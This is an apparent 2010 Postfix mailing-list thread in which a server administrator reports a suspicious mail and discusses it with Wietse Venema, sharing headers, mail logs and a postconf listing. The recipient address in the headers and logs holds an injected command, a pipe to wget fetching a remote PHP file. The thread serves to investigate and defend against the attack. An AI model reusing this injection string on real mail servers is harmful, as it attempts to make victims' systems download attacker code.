On 22.04.2010 12:50, Wietse Venema wrote:
> Arno Sch�fer:
>> Hi,
>>
>> I just received the following mail in my root account's local inbox:
>>
>> >From b...@dick.com Fri Apr 9 17:54:55 2010
>> Return-Path: <b...@dick.com>
>> X-Original-To: "root+:|wget http://fortunes.in/x1x.php";
>> Delivered-To: "root+:|wget http://fortunes.in/x1x.php"@somedomain.de
>> Received: from bluedick (unknown [208.88.6.50])
>> by mail.somedomain.de (Postfix) with SMTP id 800FC35405B
>> for <"root+:|wget http://fortunes.in/x1x.php";>; Fri, 9 Apr 2010
>> 17:54:55 +0200 (CEST)
>> Message-Id: <20100409155455.800fc354...@mail.somedomain.de>
>> Date: Fri, 9 Apr 2010 17:54:55 +0200 (CEST)
>> From: b...@dick.com
>> To: undisclosed-recipients:;
>> Status: RO
>>
>>
>> This appears to be some kind of attack (possibly not specifically aimed
>> at postfix), that tries to exploit some mailer problem and trick the
>> system into executing a command (wget). I can not tell for sure if it
>> succeeded, at least I did not find an "x1x*" file anywhere on my system.
>>
>> However, at least it succeeded in one thing, that is tricking out the
>> "aliases" mechanism. Normally, mail to root on my system is forwarded to
>> an external address as per:
>>
>> root: u...@somedomain.cx
>>
>> in /etc/aliases
>>
>> In this case, however, the mail landed in my local inbox, so it appears
>> in this case postfix did not do what it was supposed to do.
>
> You have configured Postfix or procmail to deliver root+stuff
> different than root. You can easily verify this by hand, while
> keeping an eye on the maillog file. This will also confirm that
> the behavior has nothing to do with having a "|" in an address
> extension.
Hm. I am not quite sure why the mail is delivered locally. In the
manpage, it says:
ADDRESS EXTENSION
The optional recipient_delimiter configuration parameter
specifies how to separate address extensions from local
recipient names.
For example, with "recipient_delimiter = +", mail for
name+foo is delivered to the alias name+foo or to the
alias name, to the destinations listed in ~name/.for-
ward+foo or in ~name/.forward, to the mailbox owned by the
user name, or it is sent back as undeliverable.
I read this such that since I have no .forward and no other alias, the
mail should be delivered to "name", in this case "root", which is
aliased to the external address.
In the "normal" case, it does that:
Apr 22 13:16:17 www postfix/smtpd[26648]: connect from
mail.gmx.net[213.165.64.20]
Apr 22 13:16:17 www postfix/smtpd[26648]: 33D9835405B:
client=mail.gmx.net[213.165.64.20]
Apr 22 13:16:17 www postfix/cleanup[20905]: 33D9835405B:
message-id=<4bd0300d.5070...@gmx.de>
Apr 22 13:16:17 www postfix/qmgr[27918]: 33D9835405B:
from=<myem...@gmx.de>, size=1210, nrcpt=1 (queue active)
Apr 22 13:16:17 www postfix/smtpd[26648]: disconnect from
mail.gmx.net[213.165.64.20]
Apr 22 13:16:17 www postfix/cleanup[20905]: 408CF35405E:
message-id=<4bd0300d.5070...@gmx.de>
Apr 22 13:16:17 www postfix/qmgr[27918]: 408CF35405E:
from=<myem...@gmx.de>, size=1352, nrcpt=1 (queue active)
Apr 22 13:16:17 www postfix/local[20906]: 33D9835405B:
to=<root+...@somedomain.de>, relay=local, delay=0.1,
delays=0.07/0.02/0/0.02, dsn=2.0.0, status=sent (forwarded as 408CF35405E)
Apr 22 13:16:17 www postfix/qmgr[27918]: 33D9835405B: removed
Apr 22 13:16:17 www postfix/smtp[20907]: 408CF35405E:
to=<u...@somedomain.cx>, orig_to=<root+...@somedomain.de>,
relay=somedomain.cx[84.59.34.193]:25, delay=0.49,
delays=0.01/0.01/0.21/0.26, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued
as 781AB4C62D)
Apr 22 13:16:17 www postfix/qmgr[27918]: 408CF35405E: removed
But if there is an illegal extension, like here:
RCPT TO:<"root+:|wget http://fortunes.in/x1x.php"@somedomain.de>
it delivers locally (this is the original mail log):
Apr 9 17:54:55 www postfix/smtpd[15767]: connect from unknown[208.88.6.50]
Apr 9 17:54:55 www postfix/smtpd[15767]: 800FC35405B:
client=unknown[208.88.6.50]
Apr 9 17:54:55 www postfix/cleanup[6818]: 800FC35405B:
message-id=<20100409155455.800fc354...@mail.somedomain.de>
Apr 9 17:54:55 www postfix/qmgr[2293]: 800FC35405B:
from=<b...@dick.com>, size=359, nrcpt=1 (queue active)
Apr 9 17:54:55 www postfix/smtpd[15767]: disconnect from
unknown[208.88.6.50]
Apr 9 17:54:55 www postfix/local[6819]: warning: 800FC35405B: address
with illegal extension: root+:|wget http://fortunes.in/x1x.php
Apr 9 17:54:55 www postfix/local[6819]: 800FC35405B: to=<root+:|wget
http://fortunes.in/x1x....@somedomain.de>, orig_to=<root+:|wget
http://fortunes.in/x1x.php>, relay=local, delay=0.22,
delays=0.16/0.02/0/0.04, dsn=2.0.0, status=sent (delivered to mailbox)
Apr 9 17:54:55 www postfix/qmgr[2293]: 800FC35405B: removed
Why is aliasing bypassed(?) in this case?
Regards,
Arno
>
> Wietse
>
>> Can anyone tell if this is something that should be addressed as a
>> security issue? Can this kind of attack potentially do any harm other
>> than deliver mail to the local inbox?
>>
>> Here are some system parameters:
>>
>> I am running debian 5.0.4, postfix 2.5.5-1.1.
>>
>> Here is my postconf -n:
>>
>> alias_database = hash:/etc/aliases
>> alias_maps = hash:/etc/aliases
>> append_dot_mydomain = no
>> biff = no
>> config_directory = /etc/postfix
>> inet_interfaces = all
>> mailbox_size_limit = 0
>> mydestination =
>> somedomain.de,someotherdomain.de,localhost.localdomain,localhost
>> myhostname = mail.somedomain.de
>> mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
>> myorigin = /etc/mailname
>> readme_directory = no
>> recipient_delimiter = +
>> relayhost =
>> smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
>> smtpd_banner = $myhostname ESMTP
>> smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem
>> smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key
>> smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
>> smtpd_use_tls = yes
--
Arno Schäfer
IT-Beratung & Softwareentwicklung
PHP - Java - Web-Anwendungen
Linux/Unix - MySQL - Hochverfügbarkeit - Security
Weilbornstraße 10 - 63303 Dreieich
mailto: arno_schae...@gmx.de
Tel. +49-6103-699967 | Mobil +49-171-7939236
